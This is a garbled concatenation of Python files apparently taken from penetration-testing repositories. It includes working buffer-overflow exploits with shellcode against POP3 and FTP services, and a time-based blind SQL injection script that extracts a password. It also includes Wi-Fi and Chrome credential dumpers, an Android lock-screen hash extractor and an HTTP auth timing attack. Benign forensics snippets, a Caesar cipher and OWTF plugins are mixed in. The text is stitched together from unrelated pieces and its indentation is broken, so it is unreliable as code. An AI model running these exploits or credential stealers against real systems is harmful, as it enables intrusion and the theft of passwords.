buf += "\x89\x87\x53\xcf\xde\x76\xaa\x85\xf2\x21\x04\xbb\x0e"
buf += "\xb7\x6f\x7f\xd5\x04\x71\x7e\x98\x31\x55\x90\x64\xb9"
buf += "\xd1\xc4\x38\xec\x8f\xb2\xfe\x46\x7e\x6c\xa9\x35\x28"
buf += "\xf8\x2c\x76\xeb\x7e\x31\x53\x9d\x9e\x80\x0a\xd8\xa1"
buf += "\x2d\xdb\xec\xda\x53\x7b\x12\x31\xd0\x8b\x59\x1b\x71"
buf += "\x04\x04\xce\xc3\x49\xb7\x25\x07\x74\x34\xcf\xf8\x83"
buf += "\x24\xba\xfd\xc8\xe2\x57\x8c\x41\x87\x57\x23\x61\x82"
buffer='A'*2606 + '\x8f\x35\x4a\x5f' + "\x90"*8 +buf
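# Layout (inferred from the offsets above): 2606 bytes of padding to reach
# EIP, a little-endian return address (0x5f4a358f), an 8-byte NOP sled, then
# the shellcode.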
if 1:
print"Fuzzing PASS with %s bytes" % len(string)
#print str(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.250.136',110))
data=s.recv(1024)
#print str(data)
s.send('USER root \r\n')
data=s.recv(1024)
print str(data)
s.send('PASS ' + buffer + '\r\n')
#data=s.recv(1024)
#print str(data)
print "done"
#s.send('QUIT\r\n')
s.close()
| 35.885246 | 61 | 0.650956 |
cybersecurity-penetration-testing | import subprocess
import sys
ipfile = sys.argv[1]
IPs = open(ipfile, "r")
output = open("sslscan.csv", "w+")
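# Usage sketch (script name illustrative; assumes the sslscan binary is on
# PATH and the input file holds one IP/host per line):
#   python sslscan_wrapper.py targets.txt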
for IP in IPs:
try:
command = "sslscan "+IP
ciphers = subprocess.check_output(command.split())
for line in ciphers.splitlines():
if "Accepted" in line:
output.write(IP+","+line.split()[1]+","+line.split()[4]+","+line.split()[2]+"\r")
except:
        pass
| 18.947368 | 85 | 0.632275 |
cybersecurity-penetration-testing | import exif_parser
import id3_parser
import office_parser
| 18.333333 | 20 | 0.859649 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
Penetration_Testing | #!/usr/bin/python
'''
Caesar Cipher encryption and decryption.
'''
import sys
def getOption():
    while True:
        do = raw_input("Do you wish to encrypt or decrypt a message?\n").lower()
        if do in "encrypt e decrypt d".split():
            return do
        elif do in "no quit exit".split():
            sys.exit(0)
        else:
            print "Enter either 'encrypt' or 'e' or 'decrypt' or 'd'."
def getMessage():
print "Enter your message:"
return raw_input()
def getKey():
    MAX_KEY_SIZE = 26
    while True:
        print "Enter the key number (1-{})".format(MAX_KEY_SIZE)
        key = int(raw_input())
        if key >= 1 and key <= MAX_KEY_SIZE:
            return key
def getConvertedMessage(do, message, key):
if do[0] == 'd':
key = -key
converted = ""
for symbol in message:
if symbol.isalpha():
num = ord(symbol)
num += key
if symbol.isupper():
if num > ord('Z'):
num -= 26
elif num < ord('A'):
num += 26
elif symbol.islower():
if num > ord('z'):
num -= 26
elif num < ord('a'):
num += 26
converted += chr(num)
else:
converted += symbol
return converted
do = getOption()
message = getMessage()
key = getKey()
print "Your converted text is:"
print getConvertedMessage(do, message, key)
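# Example run (key 3): "Attack at dawn" encrypts to "Dwwdfn dw gdzq".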
| 15.887324 | 73 | 0.616027 |
Ethical-Hacking-Scripts | import subprocess, re
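# Note: Windows-only; relies on the netsh CLI, and reading keys with
# key=clear typically requires an elevated (administrator) prompt.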
item = subprocess.run(["netsh","wlan","show","profiles"],capture_output=True).stdout.decode()
prof_names = (re.findall("All User Profile : (.*)\r", item))
passwords = []
check_networks = []
for i in prof_names:
item = subprocess.run(["netsh", "wlan", "show", "profiles",i], capture_output=True).stdout.decode()
security_key = False
security_key_present = (re.findall("Security key : (.*)\r", item))
if security_key_present[0] == "Present":
check_networks.append(i)
else:
pass
for i in check_networks:
item = subprocess.run(["netsh","wlan","show","profiles",i,"key=clear"],capture_output=True).stdout.decode()
wifi_pass = (re.findall("Key Content : (.*)\r",item))
wifi_pass = wifi_pass[0]
info = {'ssid': i, 'key': wifi_pass}
passwords.append(info)
main_msg = ""
for i in passwords:
main_msg = main_msg + str(i) + ","
main_msg = f"Wifi Passwords: {main_msg}"
print(main_msg)
| 40.833333 | 112 | 0.60319 |
cybersecurity-penetration-testing | from datetime import datetime
import os
from time import gmtime, strftime
from PIL import Image
import processors
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This scripts parses embedded EXIF metadata from compatible objects'
def exifParser(filename):
"""
The exifParser function confirms the file type and sends it to be processed.
:param filename: name of the file potentially containing EXIF metadata.
:return: A dictionary from getTags, containing the embedded EXIF metadata.
"""
# JPEG signatures
signatures = ['ffd8ffdb','ffd8ffe0', 'ffd8ffe1', 'ffd8ffe2', 'ffd8ffe3',
'ffd8ffe8']
if processors.utility.checkHeader(filename, signatures, 4) == True:
return getTags(filename)
else:
print 'File signature does not match known JPEG signatures.'
raise TypeError('File signature does not match JPEG object.')
def getTags(filename):
"""
The getTags function extracts the EXIF metadata from the data object.
:param filename: the path and name to the data object.
:return: tags and headers, tags is a dictionary containing EXIF metadata and headers are the
order of keys for the CSV output.
"""
# Set up CSV headers
headers = ['Path', 'Name', 'Size', 'Filesystem CTime', 'Filesystem MTime', 'Original Date', 'Digitized Date',
'Make', 'Model', 'Software', 'Latitude', 'Latitude Reference', 'Longitude', 'Longitude Reference',
'Exif Version', 'Height', 'Width', 'Flash', 'Scene Type']
image = Image.open(filename)
# Detects if the file is corrupt without decoding the data
image.verify()
# Descriptions and values of EXIF tags: http://www.exiv2.org/tags.html
exif = image._getexif()
tags = {}
tags['Path'] = filename
tags['Name'] = os.path.basename(filename)
tags['Size'] = processors.utility.convertSize(os.path.getsize(filename))
tags['Filesystem CTime'] = strftime('%m/%d/%Y %H:%M:%S', gmtime(os.path.getctime(filename)))
tags['Filesystem MTime'] = strftime('%m/%d/%Y %H:%M:%S', gmtime(os.path.getmtime(filename)))
if exif:
for tag in exif.keys():
if tag == 36864:
tags['Exif Version'] = exif[tag]
elif tag == 36867:
dt = datetime.strptime(exif[tag], '%Y:%m:%d %H:%M:%S')
tags['Original Date'] = dt.strftime('%m/%d/%Y %H:%M:%S')
elif tag == 36868:
dt = datetime.strptime(exif[tag], '%Y:%m:%d %H:%M:%S')
tags['Digitized Date'] = dt.strftime('%m/%d/%Y %H:%M:%S')
elif tag == 41990:
# Scene tags: http://www.awaresystems.be/imaging/tiff/tifftags/privateifd/exif/scenecapturetype.html
scenes = {0: 'Standard', 1: 'Landscape', 2: 'Portrait', 3: 'Night Scene'}
if exif[tag] in scenes:
tags['Scene Type'] = scenes[exif[tag]]
else:
pass
elif tag == 37385:
# Flash tags: http://www.awaresystems.be/imaging/tiff/tifftags/privateifd/exif/flash.html
flash = {0: 'Flash did not fire', 1: 'Flash fired', 5: 'Strobe return light not detected',
7: 'Strobe return light detected', 9: 'Flash fired, compulsory flash mode',
13: 'Flash fired, compulsory flash mode, return light not detected',
15: 'Flash fired, compulsory flash mode, return light detected',
16: 'Flash did not fire, compulsory flash mode', 24: 'Flash did not fire, auto mode',
25: 'Flash fired, auto mode', 29: 'Flash fired, auto mode, return light not detected',
31: 'Flash fired, auto mode, return light detected', 32: 'No flash function',
65: 'Flash fired, red-eye reduction mode',
69: 'Flash fired, red-eye reduction mode, return light not detected',
71: 'Flash fired, red-eye reduction mode, return light detected',
73: 'Flash fired, compulsory flash mode, red-eye reduction mode',
77: 'Flash fired, compulsory flash mode, red-eye reduction mode, return light not detected',
79: 'Flash fired, compulsory flash mode, red-eye reduction mode, return light detected',
89: 'Flash fired, auto mode, red-eye reduction mode',
93: 'Flash fired, auto mode, return light not detected, red-eye reduction mode',
95: 'Flash fired, auto mode, return light detected, red-eye reduction mode'}
if exif[tag] in flash:
tags['Flash'] = flash[exif[tag]]
elif tag == 271:
tags['Make'] = exif[tag]
elif tag == 272:
tags['Model'] = exif[tag]
elif tag == 305:
tags['Software'] = exif[tag]
elif tag == 40962:
tags['Width'] = exif[tag]
elif tag == 40963:
tags['Height'] = exif[tag]
elif tag == 34853:
for gps in exif[tag]:
if gps == 1:
tags['Latitude Reference'] = exif[tag][gps]
elif gps == 2:
tags['Latitude'] = dmsToDecimal(exif[tag][gps])
elif gps == 3:
tags['Longitude Reference'] = exif[tag][gps]
elif gps == 4:
tags['Longitude'] = dmsToDecimal(exif[tag][gps])
else:
pass
return tags, headers
# http://resources.arcgis.com/EN/HELP/MAIN/10.1/index.html#//003r00000005000000
def dmsToDecimal(dms):
"""
Converts GPS Degree Minute Seconds format to Decimal format.
:param dms: The GPS data in Degree Minute Seconds format.
:return: The decimal formatted GPS coordinate.
"""
deg, min, sec = [x[0] for x in dms]
if deg > 0:
return "{0:.5f}".format(deg + (min / 60.) + (sec / 3600000.))
else:
return "{0:.5f}".format(deg - (min / 60.) - (sec / 3600000.))
| 47.945313 | 117 | 0.562101 |
Python-Penetration-Testing-Cookbook | from scapy.all import *
host = 'www.dvwa.co.uk'
ip = socket.gethostbyname(host)
openp = []
filterdp = []
common_ports = { 21, 22, 23, 25, 53, 69, 80, 88, 109, 110,
123, 137, 138, 139, 143, 156, 161, 389, 443,
445, 500, 546, 547, 587, 660, 995, 993, 2086,
2087, 2082, 2083, 3306, 8443, 10000
}
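# Note: sr1() sends raw crafted packets, so this scan needs root privileges;
# a FIN/PSH/URG probe that gets no reply suggests the port is open|filtered.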
def is_up(ip):
icmp = IP(dst=ip)/ICMP()
resp = sr1(icmp, timeout=10)
if resp == None:
return False
else:
return True
def probe_port(ip, port, result = 1):
src_port = RandShort()
try:
p = IP(dst=ip)/TCP(sport=src_port, dport=port, flags='FPU')
resp = sr1(p, timeout=2) # Sending packet
        if resp is None:
            result = 1
elif resp.haslayer(TCP):
if resp.getlayer(TCP).flags == 0x14:
result = 0
elif (int(resp.getlayer(ICMP).type)==3 and int(resp.getlayer(ICMP).code) in [1,2,3,9,10,13]):
result = 2
except Exception as e:
pass
return result
if __name__ == '__main__':
conf.verb = 0
if is_up(ip):
for port in common_ports:
print (port)
response = probe_port(ip, port)
if response == 1:
openp.append(port)
elif response == 2:
filterdp.append(port)
if len(openp) != 0:
print ("Possible Open or Filtered Ports:")
print (openp)
if len(filterdp) != 0:
print ("Possible Filtered Ports:")
print (filterdp)
if (len(openp) == 0) and (len(filterdp) == 0):
print ("Sorry, No open ports found.!!")
else:
print ("Host is Down")
| 26.873016 | 105 | 0.500285 |
cybersecurity-penetration-testing | import requests

def averagetimer(url):
    times = []
    answer = "Kicking off the attempt"
    cookies = {'cookie name': 'Cookie value'}
    payload = {'injection': '\'or sleep(char_length(password));#', 'Submit': 'submit'}
    req = requests.post(url, data=payload, cookies=cookies)
    # the first response time approximates the password length in seconds
    firstresponsetime = int(req.elapsed.total_seconds())
    for x in range(1, firstresponsetime + 1):
        # each request sleeps for the ordinal value of one password character
        payload = {'injection': '\'or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'}
        req = requests.post(url, data=payload, cookies=cookies)
        responsetime = int(req.elapsed.total_seconds())
        a = chr(responsetime)
        times.append(a)
        answer = ''.join(times)
    return answer

print averagetimer('http://google.com')
| 29.666667 | 98 | 0.696734 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
import socket
import sys
shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x67\x21\x21\x68\x6c\x65\x20\x6d\x68\x53\x61\x6d\x70\x8d\x14\x24\x51\x68\x68\x65\x72\x65\x68\x68\x69\x20\x54\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
junk = 'A'*230
eip = '\x90\x06\xbe\x75'
nops = '\x90'*10
injection = junk+eip+nops+shellcode
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(('192.168.129.128',21))
s.recv(1024)
s.send('USER '+injection+'\r\n')
| 78.0625 | 983 | 0.734177 |
cybersecurity-penetration-testing | #!/usr/bin/python
import socket
NSRL_SERVER='127.0.0.1'
NSRL_PORT=9120
def nsrlquery(md5hashes):
"""Query the NSRL server and return a list of booleans.
Arguments:
md5hashes -- The list of MD5 hashes for the query.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((NSRL_SERVER, NSRL_PORT))
try:
f = s.makefile('r')
s.sendall("version: 2.0\r\n")
response = f.readline();
if response.strip() != 'OK':
raise RuntimeError('NSRL handshake error')
query = 'query ' + ' '.join(md5hashes) + "\r\n"
s.sendall(query)
response = f.readline();
if response[:2] != 'OK':
raise RuntimeError('NSRL query error')
return [c=='1' for c in response[3:].strip()]
finally:
s.close()
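# Usage sketch (hypothetical MD5; True means the hash is in the NSRL set):
#   flags = nsrlquery(['d41d8cd98f00b204e9800998ecf8427e'])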
| 21.131579 | 59 | 0.560714 |
hackipy | #!/usr/bin/python3
try:
print("[>] Importing required modules")
from utilities import is_root, nothing, get_ip_range, arp_scan, parse_responses, show_result
import argparse
except ModuleNotFoundError:
print("[!] Missing modules, Exiting...")
exit()
else:
print("[>] Modules Successfully imported")
print() # Just a line break
########################################################################
# User Defined Function
########################################################################
def get_arguments():
"""This function will get arguments from command line if there are any and return them to main function"""
parser = argparse.ArgumentParser(description="All arguments are optional")
parser.add_argument("-t", "--target", dest="ip",
help="IP or IP range to scan, all if not provided")
parser.add_argument("-s", "--silent", dest="mute",
help="Show less output", action="store_true")
options = parser.parse_args()
return options.ip, options.mute
########################################################################
# The main function
########################################################################
# Parsing the arguments
ip, mute = get_arguments()
# Checking for privileges
if is_root():
nothing()
else:
print("[!] Please run the script as root")
exit()
# Getting local IP range if IP is not provided and providing feedback
if not ip:
try:
ip = get_ip_range()
except TypeError:
print("[!] Can't get current network's IP range, Not connected to a network")
exit()
print(f"[>] IP (or IP Range) is set to {ip}") if not mute else nothing()
# Starting the scan
print() if not mute else nothing()
print(f"[+] Starting the scan") if not mute else nothing()
print() if not mute else nothing()
responses = arp_scan(ip, mute)
# Displaying the responses
print() if not mute else nothing()
if (responses):
show_result(responses, mute)
else:
print("[!] No response recieved!")
| 30.181818 | 110 | 0.564414 |
cybersecurity-penetration-testing | import binascii
import logging
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
def checkHeader(filename, headers, size):
"""
The checkHeader function reads a supplied size of the file and checks against known signatures to determine
the file type.
:param filename: The name of the file.
:param headers: A list of known file signatures for the file type(s).
:param size: The amount of data to read from the file for signature verification.
:return: Boolean, True if the signatures match; otherwise, False.
"""
with open(filename, 'rb') as infile:
header = infile.read(size)
hex_header = binascii.hexlify(header)
for signature in headers:
if hex_header == signature:
return True
else:
pass
logging.warn('The signature for {} ({}) does not match known signatures: {}'.format(
filename, hex_header, headers))
return False
def convertSize(size):
"""
The convertSize function converts an integer representing bytes into a human-readable format.
:param size: The size in bytes of a file
:return: The human-readable size.
"""
sizes = ['Bytes', 'KB', 'MB', 'GB', 'TB']
index = 0
while size > 1024:
size /= 1024.
index += 1
return '{:.2f} {}'.format(size, sizes[index])
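# Usage sketch (hypothetical file; 'ffd8ffe0' is one known JPEG signature):
#   if checkHeader('photo.jpg', ['ffd8ffe0'], 4):
#       print 'Likely a JPEG'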
| 30.840909 | 111 | 0.624286 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Michael Spreitzenbarth (research@spreitzenbarth.de)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os, sys, subprocess, binascii, struct
import sqlite3 as lite
def get_sha1hash(backup_dir):
# dumping the password/pin from the device
print "Dumping PIN/Password hash ..."
password = subprocess.Popen(['adb', 'pull', '/data/system/password.key', backup_dir],
stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
password.wait()
# cutting the HASH within password.key
sha1hash = open(backup_dir + '/password.key', 'r').readline()[:40]
print "HASH: \033[0;32m" + sha1hash + "\033[m"
return sha1hash
def get_salt(backup_dir):
# dumping the system DB containing the SALT
print "Dumping locksettings.db ..."
saltdb = subprocess.Popen(['adb', 'pull', '/data/system/locksettings.db', backup_dir],
stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
saltdb.wait()
saltdb2 = subprocess.Popen(['adb', 'pull', '/data/system/locksettings.db-wal', backup_dir],
stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
saltdb2.wait()
saltdb3 = subprocess.Popen(['adb', 'pull', '/data/system/locksettings.db-shm', backup_dir],
stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
saltdb3.wait()
# extract the SALT
con = lite.connect(backup_dir + '/locksettings.db')
cur = con.cursor()
cur.execute("SELECT value FROM locksettings WHERE name='lockscreen.password_salt'")
salt = cur.fetchone()[0]
con.close()
# convert SALT to Hex
returnedsalt = binascii.hexlify(struct.pack('>q', int(salt) ))
print "SALT: \033[0;32m" + returnedsalt + "\033[m"
return returnedsalt
def write_crack(salt, sha1hash, backup_dir):
crack = open(backup_dir + '/crack.hash', 'a+')
# write HASH and SALT to cracking file
hash_salt = sha1hash + ':' + salt
crack.write(hash_salt)
crack.close()
if __name__ == '__main__':
# check if device is connected and adb is running as root
if subprocess.Popen(['adb', 'get-state'], stdout=subprocess.PIPE).communicate(0)[0].split("\n")[0] == "unknown":
print "no device connected - exiting..."
sys.exit(2)
# starting to create the output directory and the crack file used for hashcat
backup_dir = sys.argv[1]
try:
os.stat(backup_dir)
except:
os.mkdir(backup_dir)
sha1hash = get_sha1hash(backup_dir)
salt = get_salt(backup_dir)
write_crack(salt, sha1hash, backup_dir)
print "crack.hash can now be used to feed hashcat"
print "\033[0;32m-> hashcat -a 3 -m 110 " + backup_dir + "/crack.hash -1 ?d ?1?1?1?1\033[m (just add ?1 for echt additional digit to crack)" | 35.178947 | 144 | 0.676077 |
owtf | """
AJAX testing
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "AJAX Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalAJAX")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 22.785714 | 75 | 0.759036 |
cybersecurity-penetration-testing | #!/usr/bin/python
import requests
import datetime
import string
import sys
ALPHABET = string.printable
RETRIES = 1
def fetch(url, username, password):
a = datetime.datetime.now()
r = requests.get(url, auth=requests.auth.HTTPBasicAuth(username, password))
if r.status_code == 200:
return 0
b = datetime.datetime.now()
return (b - a).total_seconds()
def main(url, username):
pass_so_far = ''
while True:
print '\n[>] Password so far: "%s"\n' % pass_so_far
times = {}
avg_times = {}
for p in ALPHABET:
times[p] = []
avg_times[p] = 0.0
for i in range(RETRIES):
password = pass_so_far + p
t = fetch(url, username, password)
if t == 0:
print 'Password found: "%s"' % password
return
times[p].append(t)
avg_times[p] = sum(times[p]) / float(RETRIES)
if ord(p) > 32:
print '\tLetter: "%c" - time: %f' % (p, avg_times[p])
max_time = [0,0]
        for letter, time_ in avg_times.items():
if time_ > max_time[1]:
max_time[0] = letter
max_time[1] = time_
pass_so_far += max_time[0]
if __name__ == '__main__':
if len(sys.argv) < 3:
print 'usage: http-auth-timing.py <url> <username>'
    main(sys.argv[1], sys.argv[2])
| 26.377358 | 79 | 0.496552 |
PenTesting | from hashlib import sha256
from re import subn
def hash(word):
word = subn('\r','',word)[0]
word = subn('\n','',word)[0]
m = sha256(word)
return {m.hexdigest():word}
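# Usage sketch (trailing newlines are stripped before hashing):
#   hash('password\n')
#   # -> {'5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8': 'password'}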
| 19.444444 | 32 | 0.595628 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Installing win32crypt
# http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/
# Dumping Google Chrome Passwords
from os import getenv # To find out the Chrome SQL path which is >> C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Login Data
import sqlite3 # To read the Chrome SQLite DB
import win32crypt # High level library to call windows API CryptUnprotectData
from shutil import copyfile # To make a copy of the Chrome SQLite DB
# LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\Users\{username}\AppData\Local
path = getenv("LOCALAPPDATA") + "\Google\Chrome\User Data\Default\Login Data"
# IF the target was logging into a site which has an entry into the DB, then sometimes reading the Chrome DB will return an error that the DB is locked
# OperationalError: database is locked
# The Workaround for this, is to make a copy the Login Data DB and pull data out of the copied DB
path2 = getenv("LOCALAPPDATA") + "\Google\Chrome\User Data\Default\Login2"
copyfile(path, path2)
# Connect to the copied Database
conn = sqlite3.connect(path2)
cursor = conn.cursor() # Create a Cursor object and call its execute() method to perform SQL commands like SELECT
# SELECT column_name,column_name FROM table_name
# SELECT action_url and username_value and password_value FROM table logins
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
# To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows.
for raw in cursor.fetchall():
print raw[0] + '\n' + raw[1] # print the action_url (raw[0]) and print the username_value (raw[1])
password = win32crypt.CryptUnprotectData(raw[2])[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it
print password # print the password in clear text
conn.close()
| 39.4375 | 153 | 0.752577 |
cybersecurity-penetration-testing | from scapy.all import *
interface ='mon0'
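# Sanity check (illustrative sketch; assumes Linux): probe requests are only
# visible on a monitor-mode interface, e.g. one created with "airmon-ng start wlan0".
import os
if not os.path.exists('/sys/class/net/' + interface):
    print "Interface %s not found - enable monitor mode first" % interface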
probe_req = []
ap_name = raw_input("Please enter the AP name ")
def probesniff(fm):
if fm.haslayer(Dot11ProbeReq):
client_name = fm.info
if client_name == ap_name :
if fm.addr2 not in probe_req:
print "New Probe Request: ", client_name
print "MAC ", fm.addr2
probe_req.append(fm.addr2)
sniff(iface= interface,prn=probesniff)
| 25.2 | 48 | 0.681122 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-14
# @File : parse_plugin.py
# @Desc : ""
import os
import re
from fuxi.views.lib.mongo_db import connectiondb, db_name_conf
from flask import Flask
app = Flask(__name__)
plugin_db = db_name_conf()['plugin_db']
def parse_plugin(plugin_filename):
name_pattern = re.compile(r'name\s*=\s*[\'\"\[](.*)[\'\"\]]')
author_pattern = re.compile(r'author\s*=\s*[\'\"\[](.*)[\'\"\]]')
date_pattern = re.compile(r'vulDate\s*=\s*[\'\"\[](.*)[\'\"\]]')
app_pattern = re.compile(r'appName\s*=\s*[\'\"\[](.*)[\'\"\]]')
type_pattern = re.compile(r'vulType\s*=\s*[\'\"\[](.*)[\'\"\]]')
version_pattern = re.compile(r'appVersion\s*=\s*[\'\"\[](.*)[\'\"\]]')
plugin_data = open(plugin_filename, 'r').read()
try:
plugin_name = name_pattern.findall(plugin_data)
plugin_author = author_pattern.findall(plugin_data)
plugin_date = date_pattern.findall(plugin_data)
plugin_app = app_pattern.findall(plugin_data)
plugin_type = type_pattern.findall(plugin_data)
plugin_version = version_pattern.findall(plugin_data)
plugin_info = {
"plugin_filename": plugin_filename,
"plugin_name": plugin_name[0],
"plugin_author": plugin_author[0],
"plugin_date": plugin_date[0],
"plugin_app": plugin_app[0],
"plugin_type": plugin_type[0],
"plugin_version": plugin_version[0],
}
return plugin_info
except Exception as e:
print(e)
pass
def local_install():
print("[*]Processing...")
connectiondb(plugin_db).drop()
path = os.getcwd() + '/pocsuite_plugin/'
files = os.listdir(path)
for file_name in files:
plugin_info = parse_plugin(path + file_name.strip())
if plugin_info is None:
pass
else:
db_insert = connectiondb(plugin_db).insert_one(plugin_info).inserted_id
print("[*]Processing Completed!")
if __name__ == "__main__":
local_install()
| 31.5625 | 83 | 0.56505 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-21
# @File : get_title.py
# @Desc : ""
import requests
import re
class TitleParser:
def __init__(self, target):
self.target = target
self.title = ''
def parser_title(self):
try:
res = requests.get(self.target)
match = re.search('<title>(.*?)</title>', res.content)
if match:
self.title = match.group(1)
else:
self.title = 'None'
except Exception as e:
self.title = 'ERR_CONNECTION_REFUSED'
return self.title
def get_title(target, subdomain_id):
target_url = "http://" + target
result = {
"title": TitleParser(target_url).parser_title(),
"_id": subdomain_id
}
return result
| 21.837838 | 66 | 0.527251 |
owtf | """
owtf.managers.resource
~~~~~~~~~~~~~~~~~~~~~~
Provides helper functions for plugins to fetch resources.
"""
import logging
import os
from owtf.db.session import get_scoped_session
from owtf.managers.config import get_conf
from owtf.models.resource import Resource
from owtf.utils.file import FileOperations
from owtf.utils.strings import multi_replace
def get_raw_resources(session, resource_type):
"""Fetch raw resources filtered on type
:param resource_type: Resource type
:type resource_type: `str`
:return: List of raw resources
:rtype: `list`
"""
filter_query = session.query(Resource.resource_name, Resource.resource).filter_by(
resource_type=resource_type
)
# Sorting is necessary for working of ExtractURLs, since it must run after main command, so order is imp
sort_query = filter_query.order_by(Resource.id)
raw_resources = sort_query.all()
return raw_resources
def get_rsrc_replacement_dict(session):
"""Get the configuration update changes as a dict
:return:
:rtype:
"""
from owtf.managers.target import target_manager
from owtf.managers.config import config_handler
configuration = get_conf(session)
configuration.update(target_manager.get_target_config)
configuration.update(config_handler.get_replacement_dict)
configuration.update(config_handler.get_framework_config_dict) # for aux plugins
return configuration
def get_resources(resource_type):
"""Fetch resources filtered on type
:param resource_type: Resource type
:type resource_type: `str`
:return: List of resources
:rtype: `list`
"""
session = get_scoped_session()
replacement_dict = get_rsrc_replacement_dict(session)
raw_resources = get_raw_resources(session, resource_type)
resources = []
for name, resource in raw_resources:
resources.append([name, multi_replace(resource, replacement_dict)])
return resources
def get_raw_resource_list(session, resource_list):
"""Get raw resources as from a resource list
:param resource_list: List of resource types
:type resource_list: `list`
:return: List of raw resources
:rtype: `list`
"""
raw_resources = session.query(Resource.resource_name, Resource.resource).filter(
Resource.resource_type.in_(resource_list)
).all()
return raw_resources
def get_resource_list(session, resource_type_list):
"""Get list of resources from list of types
:param resource_type_list: List of resource types
:type resource_type_list: `list`
:return: List of resources
:rtype: `list`
"""
replacement_dict = get_rsrc_replacement_dict(session)
raw_resources = get_raw_resource_list(session, resource_type_list)
resources = []
for name, resource in raw_resources:
resources.append([name, multi_replace(resource, replacement_dict)])
return resources
def get_resources_from_file(resource_file):
"""Fetch resources for a file
:param resource_file: Path to the resource file
:type resource_file: `str`
:return: Resources as a set
:rtype: `set`
"""
resources = set()
config_file = FileOperations.open(
resource_file, "r"
).read().splitlines() # To remove stupid '\n' at the end
for line in config_file:
if line.startswith("#"):
continue # Skip comment lines
try:
type, name, resource = line.split("_____")
resources.add((type, name, resource))
except ValueError:
logging.info(
"ERROR: The delimiter is incorrect in this line at Resource File: %s",
str(line.split("_____")),
)
return resources
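# Illustrative resource line in the "_____"-delimited format parsed above
# (values are made up):
#   ExternalAJAX_____OWASP AJAX Testing Guide_____https://owasp.org/ajax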
def load_resources_from_file(session, default, fallback):
"""Parses the resources config file and loads data into the DB
.. note::
This needs to be a list instead of a dictionary to preserve order in python < 2.7
:param file_path: Path to the resources config file
:type file_path: `str`
:return: None
:rtype: None
"""
file_path = default
logging.info("Loading resources from: %s..", default)
if not os.path.isfile(default): # check if the resource file exists
file_path = fallback
resources = get_resources_from_file(file_path)
# Delete all old resources which are not edited by user
# because we may have updated the resource
session.query(Resource).filter_by(dirty=False).delete()
for type, name, resource in resources:
session.add(Resource(resource_type=type, resource_name=name, resource=resource))
session.commit()
| 31.454545 | 108 | 0.677155 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
# Payload generator
## Total payload length
payload_length = 424
## Amount of nops
nop_length = 100
## Controlled memory address to return to in Little Endian format
#0x7fffffffddc0
#0x7fffffffe120
#current 0x7fffffffdf80: 0xffffdfa0
#0x7fffffffdde0
#return_address = '\x20\xe1\xff\xff\xff\x7f\x00\x00'
#It must be noted that the return address is $rsp
#00007fffffffde30
